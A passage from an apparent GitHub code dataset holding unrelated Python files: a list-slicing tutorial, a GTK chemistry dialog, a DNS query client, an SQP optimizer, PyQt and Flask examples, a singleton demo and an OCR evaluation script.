lst[7:0:-2]\nprint(res)\n\n# (5)[:]或[::] 截取所有列表\n\nres = lst[:]\nres = lst[::]\nprint(res)\n\n# (4)列表的获取 (同元组)\n# 0 1 2 3 4 正向索引\nlst = [\"宋江\", \"吴用\", \"卢33\", \"林冲\", \"杜十娘\"]\n# -5 -4 -3 -2 -1 逆向索引\nres = lst[4]\nres = lst[-1]\nprint(res)\n\n# (5)列表的修改 ( 可切片 )\nlst[0] = \"李11\"\nprint(lst)\n\n#1.利用切片进行数据的修改\n'''可迭代数据:容器类型数据,range对象,迭代器'''\n# 先把1:4所对应的截取数据去除,然后在把可迭代数据中的元素,依次的拿出来进行对应位置赋值\n\"\"\"无要求:截取的数据个数和实际放入的数据个数没有要求\"\"\"\nlst[1:4] = [\"石阡\",\"鲁智深\",\"武松\",\"武大郎\"]\nprint(lst)\n\n# 2.利用切片+步长的方式进行数据的修改\n\"\"\"有要求:切几个数据,就放上几个数据,元素个数要匹配\"\"\"\nprint(lst[::2])\n# 0 2 4\nlst[::2] = (1,2,3)\nprint(lst)\n\n# (6)列表的删除 ( 可切片 ) del关键字删除\nlst = [\"宋江\",\"吴用\",\"卢俊义\",\"林冲\",\"杜十娘\"]\ndel lst[0]\nprint(lst)\n\n# 可以利用切片来删除\nlst = [\"宋江\",\"吴用\",\"卢俊义\",\"林冲\",\"杜十娘\"]\ndel lst[1:3]\nprint(lst)\n\n# 把要删除的数据直接写在del 关键字的后面,如果删除res的话,是删除res这个变量,跟列表没有关系.\nres = lst[1:3]\ndel res\nprint(lst)\n\n# 元组相关操作\n\"\"\"\n元组针对于第一级所有的元素是修改不了的\n但是如果含有二级容器,并且该容器可以修改,那幺元组里面的二级或者多级可以修改\n\"\"\"\ntuplevar = (1,4,4,5,6,[434,645,43,(234,)])\nres = tuplevar[-1]\nprint(res)\nres[-2] = 88\nprint(tuplevar) #(1, 4, 4, 5, 6, [434, 645, 88, (234,)])\n\n# 集合的值或者字典的键必须是可哈希数据=>不可变得数据类型(int bool float complex str tuple)\n# setvar = {(1,2,3,4,5,6,[7,8,9])} # error unhashable type: 'list'\n","repo_name":"Sam6006/python-learning","sub_path":"day03/05.列表的相关操作.py","file_name":"05.列表的相关操作.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34937285983","text":"import gi\n\ngi.require_version(\"Gtk\", \"3.0\")\nfrom gi.repository import Gtk\n#from GTKGUI.gtkWidgets.filechooser import FileChooser\n#from easyhybrid.pDynamoMethods.pDynamo2Vismol import *\nimport gc\nimport os\n\nVISMOL_HOME = os.environ.get('VISMOL_HOME')\nHOME = os.environ.get('HOME')\n\n\nclass EasyHybridSetupQCModelWindow:\n \"\"\" Class doc \"\"\"\n \n def __init__(self, main = None):\n \"\"\" Class initialiser \"\"\"\n self.easyhybrid_main = main\n self.Visible = False \n \n self.methods_liststore = Gtk.ListStore(str, str, str)\n \n self.method_id = 0 # 0 for am1, 1 for pm3 and...\n self.charge = 0\n self.multiplicity = 1\n self.restricted = True\n \n self.adjustment_charge = Gtk.Adjustment(value=0,\n lower=-100,\n upper=100,\n step_increment=1,\n page_increment=1,\n page_size=0)\n \n self.adjustment_multiplicity = Gtk.Adjustment(value=1,\n lower=1,\n upper=100,\n step_increment=1,\n page_increment=1,\n page_size=0)\n \n self.methods_id_dictionary = {\n 0 : 'am1' ,\n 1 : 'am1dphot',\n 2 : 'pm3' ,\n 3 : 'pm6' ,\n 4 : 'mndo' ,\n \n }\n \n \n \n def OpenWindow (self):\n \"\"\" Function doc \"\"\"\n if self.Visible == False:\n self.builder = Gtk.Builder()\n self.builder.add_from_file(os.path.join(VISMOL_HOME,'easyhybrid/gui/easyhybrid_QCSetup_window.glade'))\n self.builder.connect_signals(self)\n \n self.window = self.builder.get_object('SetupQCModelWindow')\n self.window.set_keep_above(True)\n\n\n \n '''--------------------------------------------------------------------------------------------'''\n self.methods_type_store = Gtk.ListStore(str)\n methods_types = [\n \"am1\",\n \"am1dphot\",\n \"pm3\",\n \"pm6\",\n \"mndo\",\n \"ab initio - ORCA\",\n \"DFT / DFTB\",\n ]\n for method_type in methods_types:\n self.methods_type_store.append([method_type])\n #print (method_type)\n \n self.methods_combo = self.builder.get_object('QCModel_methods_combobox')\n self.methods_combo.connect(\"changed\", self.on_name_combo_changed)\n self.methods_combo.set_model(self.methods_type_store)\n renderer_text = Gtk.CellRendererText()\n self.methods_combo.pack_start(renderer_text, True)\n self.methods_combo.add_attribute(renderer_text, \"text\", 0)\n self.methods_combo.set_active(self.method_id)\n '''--------------------------------------------------------------------------------------------'''\n\n\n self.spinbutton_charge = self.builder.get_object('spinbutton_charge' )\n self.spinbutton_multiplicity = self.builder.get_object('spinbutton_multiplicity')\n self.spinbutton_charge .set_adjustment(self.adjustment_charge)\n self.spinbutton_multiplicity.set_adjustment(self.adjustment_multiplicity)\n \n self.window.show_all() \n self.builder.connect_signals(self) \n \n \n ''' Updating the number of atoms '''\n self.update_number_of_qc_atoms ()\n \n self.Visible = True\n\n else:\n ''' Updating the number of atoms '''\n self.update_number_of_qc_atoms ()\n\n \n def update_number_of_qc_atoms (self):\n \"\"\" Function doc \"\"\"\n self.entry_number_of_qc_atoms = self.builder.get_object('entry_number_of_qc_atoms')\n \n ''' Estiamting the QC charge '''\n '''----------------------------------------------------------------------------------------------'''\n psystem = self.easyhybrid_main.p_session.systems [self.easyhybrid_main.p_session.active_id]\n estimated_charge = 0.0\n for index in psystem['qc_table']:\n estimated_charge += psystem['system'].mmState.charges[index]\n \n estimated_charge = int(round(estimated_charge))\n self.spinbutton_charge.set_value (estimated_charge)\n '''----------------------------------------------------------------------------------------------'''\n\n \n if self.easyhybrid_main.p_session.systems[self.easyhybrid_main.p_session.active_id]['qc_table']:\n number_of_qc_atoms = len(self.easyhybrid_main.p_session.systems[self.easyhybrid_main.p_session.active_id]['qc_table'])\n self.entry_number_of_qc_atoms.set_text(str(number_of_qc_atoms))\n else:\n number_of_qc_atoms = len(self.easyhybrid_main.p_session.systems[self.easyhybrid_main.p_session.active_id]['system'].atoms)\n self.entry_number_of_qc_atoms.set_text(str(number_of_qc_atoms)+ ' (all)')\n \n \n def CloseWindow (self, button, data = None):\n \"\"\" Function doc \"\"\"\n self.window.destroy()\n self.Visible = False\n \n #----------------------------------------------------------------\n def on_spian_button_change (self, widget):\n \"\"\" Function doc \"\"\"\n self.charge = self.spinbutton_charge.get_value_as_int()\n self.multiplicity = self.spinbutton_multiplicity.get_value_as_int()\n \n \n def on_name_combo_changed (self, combobox):\n \"\"\" Function doc \"\"\"\n self.method_id = self.builder.get_object('QCModel_methods_combobox').get_active()\n \n def on_button_ok (self, button):\n \"\"\" Function doc \"\"\"\n #print(button)\n #charge = self.spinbutton_charge.get_value_as_int()\n #multiplicity = self.spinbutton_multiplicity.get_value_as_int()\n #print('\\n\\ncharge' , self.charge )\n #print('multiplicity', self.multiplicity)\n #print('method_id' , self.method_id )\n \n if self.builder.get_object('radio_button_restricted').get_active():\n #print(\"%s is active\" % (self.builder.get_object('radio_button_restricted').get_label()))\n self.restricted = True\n else:\n #print(\"%s is not active\" % (self.builder.get_object('radio_button_restricted').get_label()))\n self.restricted = False\n \n\n \n parameters = {\n 'charge' : self.charge ,\n 'multiplicity' : self.multiplicity,\n 'method' : self.methods_id_dictionary[self.method_id] ,\n 'restricted' : self.restricted ,\n }\n\n\n parameters['energyTolerance' ] = float(self.builder.get_object('entry_energyTolerance').get_text())\n parameters['densityTolerance' ] = float(self.builder.get_object('entry_densityTolerance').get_text())\n parameters['maximumIterations'] = int(self.builder.get_object('entry_maximumIterations').get_text())\n\n\n\n self.easyhybrid_main.p_session.define_a_new_QCModel(parameters =parameters)\n self.easyhybrid_main.update_gui_widgets ()\n self.window.destroy()\n self.Visible = False\n\n","repo_name":"ferbachega/EasyHybrid3_old","sub_path":"easyhybrid/gui/QCSetup_window.py","file_name":"QCSetup_window.py","file_ext":"py","file_size_in_byte":7904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"70316466135","text":"#!/usr/bin/env python3\n\nimport socket, sys\n\n# Mirar servidor DNS en fichero \"/etc/resolv.conf\"\nDNS_DIR = '8.8.4.4'\nDNS_PORT = 53\n\nif len( sys.argv ) != 2:\n\tprint( \"Uso: python3 {} \".format( sys.argv[0] ) )\n\texit( 1 )\n\nnombre_dns = sys.argv[1]\n\nserv_dns = (DNS_DIR, DNS_PORT)\n\ns = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )\n\n\"\"\"A COMPLETAR POR EL/LA ESTUDIANTE:\nPreparar pregunta DNS\n\"\"\"\nnum = 1\n# Header section\n# # ID\nid = 351\nbuf = id.to_bytes(2, byteorder=\"big\")\n# # Flags\nnum = 256\nbuf += num.to_bytes(2, byteorder=\"big\")\nnum = 1\n# # QDCOUNT\nbuf+= num.to_bytes(2, byteorder=\"big\")\nnum = 0\n# # ANCOUNT\nbuf += num.to_bytes(2, byteorder=\"big\")\n# # NSCOUNT\nbuf += num.to_bytes(2, byteorder=\"big\")\n# # ARCOUNT\nbuf += num.to_bytes(2, byteorder=\"big\")\n# Question section\n# # QNAME\n\n\nprint('NOMBRE DNS: ', nombre_dns)\n\n\ndomain_s = nombre_dns.split(\".\")\nname = b''\nfor part in domain_s:\n\tname += len(part).to_bytes(1, byteorder=\"big\")\n\tname += part.encode()\n\n\nname += b'\\x00'\n\nbuf += name\nnum = 1\n# # QTYPE. type = A\nbuf += num.to_bytes(2, byteorder=\"big\")\n# # QCLASS. class = IN\nbuf += num.to_bytes(2, byteorder=\"big\")\n# -- Pregunta DNS completa --\nprint( \"Pregunta DNS a enviar:\\r\\n\", buf )\n# Enviar pregunta DNS\ns.sendto( buf, serv_dns )\n\n\nprint(\"ENVIADO !! \")\n\n# Recibir respuesta\nbuf = s.recv( 1024 )\n\nprint( \"Respuesta recibida:\\r\\n\", buf)\n\"\"\"A COMPLETAR POR EL/LA ESTUDIANTE:\nIntrepretar respuesta\n\"\"\"\n\n\n\n\n\n\n# Header section\n# # ID\nres_id = int.from_bytes(buf[0:2], 'big')\nprint(res_id)\n# # Flags: |QR| Opcode |AA|TC|RD|RA| Z | RCODE |\n# # +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# # QDCOUNT\t\nres_count = int.from_bytes(buf[2:4], 'big')\nprint(res_count)\n# # ANCOUNT\nres_ancount = int.from_bytes(buf[4:6], 'big')\nprint(res_ancount)\n# # NSCOUNT\nres_ancount = int.from_bytes(buf[6:8], 'big')\nprint(\"ANCOUNT: {} ({}) \".format(res_ancount > 0, res_ancount)) # ANCONT determina el número de direcciones IP resueltas. Algunos dominios \n# (por ejemplo los que usan el proxy de cloudflare, suelen tener 2 IP en el registro A)\n# # ARCOUNT\nancount = res_ancount\nres_arcount = bool(int.from_bytes(buf[8:10], 'big'))\n\n# Question section\n# # QNAME\n\nqname = buf[12] \nres_ancount = res_ancount > 0 # Esto es true si el campo ANCOUNT devuelve algo mayor que 0 (lo que implica que ha encontrado registros para el dominio especificado) \n\ni = 13\nprint(\"Question section: \", buf[12:13])\n\nqname_ = \"\"\nwhile (qname != 0):\n\tqname = buf[i]\n\tc = chr(qname)\n\tif (qname < 97):\n\t\tqname_ += \".\"\n\telse:\n\t\tqname_ += str(c)\n\ti = i+1\n\nqname_ = qname_[:-1] \nprint(\"QNAME: \", qname_)\n# # QTYPE\nqtype = int.from_bytes(buf[i:i+2], 'big')\nprint(\"QTYPE: \", qtype) \n# # QCLASS\ni = i+2\nqclass = int.from_bytes(buf[i:i+2], 'big')\nprint(\"QCLASS: \", qclass) \ni = i+2 \n# Answer section: 4.1.3. Resource record format\nif not res_ancount:\n\tprint( 'No se ha recibido ningún registro en la sección de respuestas!' )\nelse:\n\t# # NAME (Message compression?)\n\tp = buf[i]\n\tn = \"\"\n\twhile (p!=0):\n\t\tn += chr(p)\n\t\ti = i+1 \n\t\tp = buf[i]\n\tprint(\"NAME: \", n) \n\t# # TYPE\n\tprint(\"TYPE: \", int.from_bytes(buf[i:i+2], 'big'))\n\ti = i +2 \n\t# # CLASS\n\tprint(\"CLASS: \", int.from_bytes(buf[i:i+2], 'big'))\n\t# # TTL: a 32 bit unsigned integer\n\ti = i +2\n\tprint(\"TTL: \", int.from_bytes(buf[i:i+4], 'big'))\n\ti = i +4\n\t# # RDLENGTH: an unsigned 16 bit integer\n\tprint(\"RDLENGTH: \", int.from_bytes(buf[i:i+2], 'big'))\n\t# # RDATA\n\tip = \"\"\n\tip += str(int.from_bytes(buf[len(buf) - 4 : len(buf) - 3], 'big')) + \".\"\n\tip += str(int.from_bytes(buf[len(buf) - 3 : len(buf) - 2], 'big')) + \".\"\n\tip += str(int.from_bytes(buf[len(buf) - 2 : len(buf) - 1], 'big')) + \".\"\n\tip += str(int.from_bytes(buf[len(buf) - 1 : len(buf)] , 'big'))\n\tprint(\"Ip completa: \", ip)\n# Authority section: 4.1.3. Resource record format\n# Additional section: 4.1.3. Resource record format\n\ts.close()\n","repo_name":"mikelmiras/labos-sar","sub_path":"lab03/dns_cli.py","file_name":"dns_cli.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4451346508","text":"from numpy import *\nfrom qlcp import qlcp\ntry:\n import openopt\nexcept:\n pass # if OpenOpt is not installed, the qpsolver kwarg can't be specified\n \ndef _simple_grad(f, x, delta = 1e-8):\n nvars = x.shape[0]\n Id = eye(nvars)*delta\n grad = array([(f(x+Id[i,:]) - f(x-Id[i,:]))/(2*delta) for i in range(nvars)])\n return grad\n\ndef _simple_hessian(f, x, delta = 1e-4): # generally too slow for use\n g = lambda x: _simple_grad(f, x, delta = delta) # g(x) is the gradient of f\n return _simple_grad(g, x, delta=delta)\n\ndef _simple_hessdiag(f, x, delta = 1e-4):\n nvars = x.shape[0]\n Id = eye(nvars)*delta\n hd = array([(f(x+Id[i,:]) + f(x-Id[i,:]) - 2*f(x))/delta**2 for i in range(nvars)]).flatten()\n return diag(hd)\n\ndef sqlcp(f, x0, df=None, A=None, b=None, Aeq=None, beq=None, lb=None, ub=None, minstep=1e-15, minfchg=1e-15, qpsolver=None, callback = None):\n '''\n SQP solver. Approximates f in x0 with paraboloid with same gradient and hessian,\n then finds its minimum with a quadratic solver (qlcp by default) and uses it as new point, \n iterating till changes in x and/or f drop below given limits. \n Requires the Hessian to be definite positive.\n The Hessian is initially approximated by its principal diagonal, and then\n updated at every step with the BFGS method.\n f: objective function of x to be minimized\n x0: initial value for f\n df: gradient of f: df(f) should return a function of such as f(x) would\n return the gradient of f in x. If missing or None, an approximation \n will be calculated with an internal finite-differences procedure.\n A: array of inequality constraints (A x >= b)\n b: right-hand side of A x >= b\n Aeq: array of equality constraints (Aeq x = beq)\n beq: right-hand side of Aeq x >= beq\n lb: lower bounds for x (assumed -Inf if missing)\n ub: upper bounds for x (assumed +Inf if missing)\n minstep: iterations terminate when updates to x become < minstep (default: 1e-15)\n minfchg: iterations terminate when RELATIVE changes in f become < minfchg (default: 1e-15)\n qpsolver: if None, qlcp; else a solver accepted by openopt.QP (if OpenOpt and \n that particular solver are installed)\n '''\n \n nvars = x0.shape[0]\n x = x0.copy()\n niter = 0\n deltah = 1e-4\n deltag = deltah**2\n \n if df == None: # df(x) is the gradient of f in x\n df = lambda x: _simple_grad(f, x, deltag)\n \n twoI = 2.*eye(nvars)\n oldfx = f(x)\n gradfx = df(x) # return the gradient of f() at x\n hessfx = _simple_hessdiag(f,x,delta=deltah) # good enough, and much faster, but only works if REAL Hessian is DP!\n invhessfx = linalg.inv(hessfx)\n while True:\n niter += 1\n \n # compute the b, beq, lb and ub for the QP sub-problem (as bx, beqx, lbx, ubx)\n bx = b if b == None else b-dot(A,x)\n beqx = beq if beq == None else beq-dot(Aeq,x)\n lbx = lb if lb == None else lb - x\n ubx = ub if ub == None else ub - x\n\n if qpsolver == None:\n deltax = qlcp(hessfx, gradfx, A=A, b=bx, Aeq=Aeq, beq=beqx, lb=lbx, ub=ubx, QI=invhessfx)\n else:\n p = openopt.QP(hessfx, gradfx, A=A, b=bx, Aeq=Aeq, beq=beqx, lb=lbx, ub=ubx)\n p.ftol = 1.e-10\n r = p.solve(qpsolver, iprint = -1)\n deltax = p.xf\n \n if deltax == None:\n #print(\"Cannot converge, sorry.\")\n x = None\n break\n \n x += deltax\n if linalg.norm(deltax) < minstep:\n break\n fx = f(x)\n if abs(fx-oldfx) < minfchg*abs(fx):\n break\n if callback is not None and callback(x):\n break\n \n oldfx = fx\n oldgradfx = gradfx.copy()\n gradfx = df(x) # return the gradient of f() at the new x\n # we might also put a termination test on the norm of grad...\n \n '''\n # recalc hessian afresh would be sloooow...\n #hessfx = _simple_hessian(f,x,delta=deltah) # return the hessian of f() at x\n hessfx = _simple_hessdiag(f,x,delta=deltah) # return the hessian (diag only) of f() at x\n invhessfx = linalg.inv(hessfx)\n '''\n # update Hessian and its inverse with BFGS based on current Hessian, deltax and deltagrad \n # See http://en.wikipedia.org/wiki/BFGS\n deltagrad = gradfx - oldgradfx\n hdx = dot(hessfx, deltax)\n dgdx = dot(deltagrad,deltax)\n #if dgdx < 0.:\n # print \"deltagrad * deltax < 0!\" # a bad sign\n hessfx += ( outer(deltagrad,deltagrad) / dgdx - \n outer(hdx, hdx) / dot(deltax, hdx) )\n # now update inverse of Hessian \n '''\n invhessfx = linalg.inv(hessfx)\n '''\n hidg = dot(invhessfx,deltagrad)\n oIdgdeltax = outer(hidg,deltax)\n invhessfx += ( (dgdx+dot(deltagrad,hidg))*outer(deltax,deltax)/(dgdx**2) -\n (oIdgdeltax+oIdgdeltax.T)/dgdx ) # just because invhessfx is symmetric, or else:\n #(oIdgdeltax+outer(deltax,dot(invhessfx.T,deltagrad)))/dgdx )\n return x, niter\n \n","repo_name":"troyshu/openopt","sub_path":"openopt/solvers/HongKongOpt/sqlcp.py","file_name":"sqlcp.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"67"} +{"seq_id":"71531709652","text":"import sys\r\nfrom PyQt5.QtWidgets import QWidget, QPushButton, QHBoxLayout, QVBoxLayout, QApplication\r\n\r\nclass Example(QWidget):\r\n\tdef __init__(self):\r\n\t\tsuper().__init__()\r\n\t\tself.initUI()\r\n\r\n\tdef initUI(self):\r\n\t\tokButton=QPushButton(\"OK\")\r\n\t\tcancelButton=QPushButton(\"Cancel\")\r\n\r\n\r\n\t\t#We create a horizontal box layout and add a stretch factor and both buttons. The stretch adds a\r\n\t\t#stretchable space before the two buttons. This will push them to the right of the window\r\n\t\thbox=QHBoxLayout()\r\n\t\thbox.addStretch(1)\r\n\t\thbox.addWidget(okButton)\r\n\t\thbox.addWidget(cancelButton)\r\n\r\n\r\n\t\t#To create the necessary layout, we put a horizontal layout into a vertical one. The stretch factor in\r\n\t\t#the vertical box will push the horizontal box with the buttons to the bottom of the window.\r\n\t\tvbox=QVBoxLayout()\r\n\t\tvbox.addStretch(1)\r\n\t\tvbox.addLayout(hbox)\r\n\r\n\r\n\t\t#Finally we set the main layout of the window\r\n\t\tself.setLayout(vbox)\r\n\r\n\t\tself.setGeometry(300,300,300,150)\r\n\t\tself.setWindowTitle('Buttons')\r\n\t\tself.show()\r\n\r\nif __name__=='__main__':\r\n\tapp=QApplication(sys.argv)\r\n\tex=Example()\r\n\tsys.exit(app.exec_())","repo_name":"dibakarbose/PyQt","sub_path":"PracticeCodes/12_Box Layout.py","file_name":"12_Box Layout.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73999321812","text":"from flask import Flask, Response\nfrom flask_cors import CORS\nimport json\nimport time\n\napp = Flask(__name__)\nCORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\nwith open('data/postcodes.json', 'r') as data:\n postcode_data = json.load(data)\n\n\n@app.route(\"/postcodes\", methods=['GET'])\ndef get_postcodes():\n return Response(json.dumps(postcode_data), mimetype='application/json')\n\n\n@app.route(\"/postcodes/\", methods=['GET'])\ndef get_postcode(postcode: str):\n data = [record for record in postcode_data\n if record['postal_code'] == postcode]\n #time.sleep(10)\n return Response(json.dumps(data), mimetype='application/json')\n","repo_name":"dedickinson/base-react-app","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39020444908","text":"\"\"\"\n测试单例模式\n\"\"\"\n\n\nclass MySingleton:\n __obj = None # 类属性\n __init_flag = True\n\n def __new__(cls, *args, **kwargs):\n if cls.__obj == None:\n cls.__obj = object.__new__(cls)\n return cls.__obj\n\n def __init__(self, name):\n if MySingleton.__init_flag:\n print(\"init......\")\n self.name = name\n MySingleton.__init_flag = False\n\n\nif __name__ == '__main__':\n a = MySingleton(\"aaaa\")\n b = MySingleton(\"bbbb\")\n print(a)\n print(b)\n","repo_name":"Jacket777/python_basic","sub_path":"ch09_Class/code26_singletonMode.py","file_name":"code26_singletonMode.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25908319813","text":"from pipline import pipeline,create_sess,Result\nfrom glob import glob\nfrom tqdm import tqdm\nimport os\nimport re\nfrom inference import set_xml_data\nimport Levenshtein\nfrom layout_utils import row_get_pair,column_get_pair,column_iou\nfrom utils import draw_pair,eval_label,draw_bboxes,draw_result,get_iou\nfrom math import log\nimport numpy as np\nimport cv2\nfrom PIL import Image,ImageDraw,ImageFont\nimport requests\nimport base64\nfrom from_xml_read_label import label_replace\n\n\n\ndef file_content(filename):\n with open(filename, 'rb') as f:\n return f.read()\n\ndef get_json_result(filename):\n img = file_content(filename)\n\n\n b64 = base64.b64encode(img).decode()\n\n BASE_URL = 'http://221.122.129.99:8005/ikkyyu/'\n data = {'secretkey':'tal', 'appkey':'tal', 'content':b64}\n r = requests.post(BASE_URL, data=data)\n\n return r.json()\n\n# print(get_json_result('1.JPG'))\n\nclass Json_Result():\n\n def __init__(self):\n self.connect_result = []\n\n\nclass Single_Img_Evaluate(object):\n def __init__(self,true_result,pre_result,img,name,save_path,log_path,bboxes, types):\n self.equation_all = 0\n self.equation_right = 0\n self.bracket_all = 0\n self.bracket_right = 0\n self.residual_all = 0\n self.residual_right = 0\n self.state_all = 0\n self.state_right = 0\n self.char_acc_all = 0\n self.char_acc = 0\n self.recall = 0\n self.all_num = 0\n self.error = []\n self.not_recall = []\n self.true_result = true_result\n self.pre_result = pre_result\n self.img = img\n self.name = name\n self.save_path = save_path\n self.log_path = log_path\n self.bboxes = bboxes\n self.types = types\n\n\n def compute(self):\n self.all = self.residual_all+self.bracket_all+self.equation_all\n self.right = self.residual_right+self.bracket_right+self.equation_right\n self.seq_acc = self.right/self.all\n self.state_acc = self.state_right/self.state_all\n self.char_acc = self.char_acc_all / self.all\n self.all_recall = self.recall / self.all_num\n\n\n if self.equation_all == 0:\n self.equation_acc = 0\n else:\n self.equation_acc = self.equation_right/self.equation_all\n if self.bracket_all == 0:\n self.bracket_acc = 0\n else:\n self.bracket_acc = self.bracket_right/self.bracket_all\n if self.residual_all == 0:\n self.residual_acc = 0\n else:\n self.residual_acc = self.residual_right/self.residual_all\n\n\n self.evaluate_dict = {'all':self.seq_acc,'=':self.equation_acc,'()':self.bracket_acc,'...':self.residual_acc,'state':self.state_acc,'char_acc':\n self.char_acc,'recall':self.all_recall}\n\n\n def print_write_result(self,log_path):\n print('图片名称:{}'.format(self.name))\n print('总共:{}道题,正确率:{}'.format(self.all,self.seq_acc))\n print('等式:{}道题,正确率:{}'.format(self.equation_all,self.equation_acc))\n print('填空题:{}道题,正确率:{}'.format(self.bracket_all,self.bracket_acc))\n print('求余数:{}道题,正确率:{}'.format(self.residual_all,self.residual_acc))\n print('判断对错的正确率{}'.format(self.state_acc))\n print('字符正确率{}'.format(self.char_acc))\n print('召回率{}'.format(self.all_recall))\n\n log = open(log_path, 'a')\n log.writelines('图片名称:{}\\n'.format(self.name))\n log.writelines('总共:{}道题,正确率:{}\\n'.format(self.all,self.seq_acc))\n log.writelines('等式:{}道题,正确率:{}\\n'.format(self.equation_all,self.equation_acc))\n log.writelines('填空题:{}道题,正确率:{}\\n'.format(self.bracket_all,self.bracket_acc))\n log.writelines('求余数:{}道题,正确率:{}\\n'.format(self.residual_all,self.residual_acc))\n log.writelines('判断对错的正确率{}\\n'.format(self.state_acc))\n log.writelines('字符正确率{}\\n'.format(self.char_acc))\n log.writelines('召回率{}\\n'.format(self.all_recall))\n log.writelines('-------------------------------------------------------------------------------------------------------------\\n')\n\n\n\n def get_pair(self):\n self.result_pair = {}\n\n for i,true_box in enumerate(self.true_result.all_box):\n max_iou = 0\n pair = -1\n for j,pre_box in enumerate(self.pre_result.connect_result):\n iou = get_iou(pre_box.bbox,true_box.bbox)\n if iou>max_iou:\n max_iou = iou\n pair = j\n\n if max_iou>0.5:\n self.result_pair[i] = pair\n\n else:\n self.result_pair[i] = -1\n\n\n return self.result_pair\n\n\n def statistic_data(self):\n\n for true_num in self.result_pair:\n\n true_box = self.true_result.all_box[true_num]\n\n if self.result_pair[true_num] != -1:\n pre_box = self.pre_result.connect_result[self.result_pair[true_num]]\n\n if true_box.classes == '=':\n if true_box.label == pre_box.output:\n self.equation_right = self.equation_right+1\n else:\n self.error.append([true_box,pre_box])\n self.equation_all = self.equation_all+1\n\n elif true_box.classes == '()':\n if true_box.label == pre_box.output:\n self.bracket_right = self.bracket_right+1\n else:\n self.error.append([true_box, pre_box])\n self.bracket_all = self.bracket_all+1\n\n else:\n if true_box.label == pre_box.output:\n self.residual_right = self.residual_right+1\n elif true_box.label.replace('*','') == pre_box.output.replace('*',''):\n self.residual_right = self.residual_right + 1\n else:\n self.error.append([true_box, pre_box])\n self.residual_all = self.residual_all+1\n\n self.char_acc_all = self.char_acc_all + 1 - (Levenshtein.distance(true_box.label, pre_box.output) / len(true_box.label))\n\n if true_box.state == pre_box.state:\n self.state_right = self.state_right+1\n self.state_all = self.state_all+1\n\n self.recall = self.recall+1\n\n else:\n self.not_recall.append(true_box)\n\n self.all_num = self.all_num+1\n\n\n def draw_result(self):\n x_pro = 3024 / self.img.shape[1]\n y_pro = 4031 / self.img.shape[0]\n img = cv2.resize(self.img, (3024, 4032))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n ttfont = ImageFont.truetype('SimSun.ttf', 50)\n img2 = img.copy()\n\n if self.error:\n for error_result in self.error:\n true = error_result[0]\n pre = error_result[1]\n cv2.rectangle(img, (int(true.left * x_pro), int(true.top * y_pro)),\n (int(true.right * x_pro), int(true.bottom * y_pro)), (0,255,0), 4)\n cv2.rectangle(img, (int(pre.left * x_pro), int(pre.top * y_pro)),\n (int(pre.right * x_pro), int(pre.bottom * y_pro)), (255,0,0), 4)\n\n img = Image.fromarray(img)\n draw = ImageDraw.Draw(img)\n draw.text((int(true.left * x_pro), int(true.top * y_pro - 50)), true.output, fill='green',\n font=ttfont)\n draw.text((int(pre.left * x_pro), int(pre.bottom * y_pro - 50)), pre.output, fill='red',\n font=ttfont)\n\n img = np.asarray(img)\n\n\n if self.not_recall:\n for result in self.not_recall:\n cv2.rectangle(img, (int(result.left * x_pro), int(result.top * y_pro)),\n (int(result.right * x_pro), int(result.bottom * y_pro)), (0, 0, 255), 4)\n cv2.rectangle(img2, (int(result.left * x_pro), int(result.top * y_pro)),\n (int(result.right * x_pro), int(result.bottom * y_pro)), (0, 0, 255), 4)\n img = Image.fromarray(img)\n draw = ImageDraw.Draw(img)\n draw.text((int(result.left * x_pro), int(result.top * y_pro - 50)), result.output, fill='blue',\n font=ttfont)\n\n img = np.asarray(img)\n\n for i, bbox in enumerate(self.bboxes):\n if self.types[i] == 'print':\n color = (0, 255, 0)\n else:\n color = (255, 0, 0)\n cv2.rectangle(img2, (int(bbox[0] * x_pro), int(bbox[1] * y_pro)),\n (int(bbox[2] * x_pro), int(bbox[3] * y_pro)), color, 4)\n\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n img2 = cv2.cvtColor(img2, cv2.COLOR_RGB2BGR)\n if self.error:\n cv2.imwrite(os.path.join(self.save_path,self.name+'.jpg'),img)\n if self.not_recall:\n cv2.imwrite(os.path.join(self.save_path, self.name + '_.jpg'), img2)\n\n\n\nclass Evaluate_Data(object):\n def __init__(self):\n self.equation_all = 0\n self.equation_right = 0\n self.bracket_all = 0\n self.bracket_right = 0\n self.residual_all = 0\n self.residual_right = 0\n self.state_all = 0\n self.state_right = 0\n self.char_acc = 0\n self.char_acc_all = 0\n self.recall = 0\n self.all_num = 0\n\n def add_data(self,single_img_evaluate):\n self.equation_all = self.equation_all + single_img_evaluate.equation_all\n self.equation_right = self.equation_right + single_img_evaluate.equation_right\n self.bracket_all = self.bracket_all + single_img_evaluate.bracket_all\n self.bracket_right = self.bracket_right + single_img_evaluate.bracket_right\n self.residual_all = self.residual_all + single_img_evaluate.residual_all\n self.residual_right = self.residual_right + single_img_evaluate.residual_right\n self.state_all = self.state_all + single_img_evaluate.state_all\n self.state_right = self.state_right + single_img_evaluate.state_right\n self.char_acc_all = self.char_acc_all + single_img_evaluate.char_acc_all\n self.recall = self.recall + single_img_evaluate.recall\n self.all_num = self.all_num + single_img_evaluate.all_num\n\n def compute(self):\n self.all = self.residual_all+self.bracket_all+self.equation_all\n self.right = self.residual_right+self.bracket_right+self.equation_right\n self.seq_acc = self.right/self.all\n 